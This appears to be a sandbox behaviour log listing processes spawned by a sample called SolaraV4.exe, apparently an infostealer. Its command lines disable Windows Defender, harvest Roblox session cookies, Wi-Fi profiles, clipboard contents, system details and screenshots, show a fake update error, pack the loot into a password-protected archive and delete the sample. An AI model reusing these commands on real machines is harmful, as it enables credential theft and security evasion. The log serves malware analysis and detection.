Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\SolaraV4.exe""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Users\user\Desktop\SolaraV4.exe "C:\Users\user\Desktop\SolaraV4.exe" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()"" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()"" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\SolaraV4.exe"" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.cmdline"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6CAA.tmp" "c:\Users\user\AppData\Local\Temp\myx0gned\CSC193A8B703A1D4F08B0E861F82E42C2AF.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *
